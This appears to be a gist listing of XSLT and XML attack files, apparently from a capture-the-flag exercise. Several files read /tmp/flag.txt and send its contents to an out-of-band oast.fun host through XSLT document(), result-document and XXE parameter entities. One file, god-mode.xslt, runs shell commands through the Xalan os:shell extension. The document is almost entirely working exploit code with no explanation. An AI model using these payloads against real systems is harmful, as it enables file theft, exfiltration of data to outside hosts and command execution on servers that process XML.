1304545
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:template match="/"> | |
| <xsl:variable name="ping" select="document('http://sqvqbzrzkbyotxcwmzzw5uh3pelr1pn7f.oast.fun/ping_test')"/> | |
| </xsl:template> | |
| </xsl:stylesheet> |
1304545
/ exploit.xslt
Created
October 14, 2025 15:08
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:template match="/"> | |
| <xsl:variable name="flag" select="unparsed-text('file:///tmp/flag.txt')" /> | |
| <xsl:result-document href="http://sqvqbzrzkbyotxcwmzzw5uh3pelr1pn7f.oast.fun/?c={$flag}" /> | |
| </xsl:template> | |
| </xsl:stylesheet> |
1304545
/ god-mode.xslt
Created
October 14, 2025 14:46
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" | |
| xmlns:xsl="http://www.w3.org/1999/XSL/Transform" | |
| xmlns:os="http://xml.apache.org/xalan/lib/os.OS" | |
| exclude-result-prefixes="os"> | |
| <xsl:template match="/"> | |
| <xsl:value-of select="os:shell('ls /tmp')"/> | |
| </xsl:template> | |
| </xsl:stylesheet> |
1304545
/ in-band-exploit.xslt
Created
October 14, 2025 14:37
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:template match="/"> | |
| <result> | |
| <xsl:value-of select="unparsed-text('file:///tmp/flag.txt')"/> | |
| </result> | |
| </xsl:template> | |
| </xsl:stylesheet> |
1304545
/ true-final.xslt
Created
October 14, 2025 14:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:template match="/"> | |
| <xsl:value-of select="document(concat('http://sqvqbzrzkbyotxcwmzzw5uh3pelr1pn7f.oast.fun/?flag=', unparsed-text('file:///tmp/flag.txt')))"/> | |
| </xsl:template> | |
| </xsl:stylesheet> |
1304545
/ final-exploit.xslt
Created
October 14, 2025 13:53
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:variable name="flag" select="unparsed-text('file:///tmp/flag.txt')" /> | |
| <xsl:variable name="oob" select="document(concat('http://sqvqbzrzkbyotxcwmzzw5uh3pelr1pn7f.oast.fun/?flag=', $flag))" /> | |
| <xsl:template match="/"> | |
| <done/> | |
| </xsl:template> | |
| </xsl:stylesheet> |
1304545
/ exploit.xslt
Created
October 14, 2025 13:45
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> | |
| <xsl:template match="/"> | |
| <result> | |
| <xsl:value-of select="unparsed-text('file:///tmp/flag.txt')" /> | |
| </result> | |
| </xsl:template> | |
| </xsl:stylesheet> |
1304545
/ victory2.xml
Created
October 14, 2025 13:38
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE root [ | |
| <!ENTITY % file SYSTEM "file:///tmp/flag.txt"> | |
| <!ENTITY % dtd "<!ENTITY % send SYSTEM 'http://sqvqbzrzkbyotxcwmzzw5uh3pelr1pn7f.oast.fun/?flag=%file;'>"> | |
| %dtd; | |
| %send; | |
| ]> | |
| <root/> |
1304545
/ attack.xml
Created
October 14, 2025 13:27
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!DOCTYPE root [ | |
| <!ENTITY % file SYSTEM "file:///tmp/flag.txt"> | |
| <!ENTITY % dtd "<!ENTITY % send SYSTEM 'http://sqvqbzrzkbyotxcwmzzw5uh3pelr1pn7f.oast.fun/?flag=%file;'>"> | |
| %dtd; | |
| %send; | |
| ]> | |
| <root/> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % file SYSTEM "file:///tmp/flag.txt"> | |
| <!ENTITY % exfil SYSTEM "http://sqvqbzrzkbyotxcwmzzw5uh3pelr1pn7f.oast.fun/?p=%file;"> |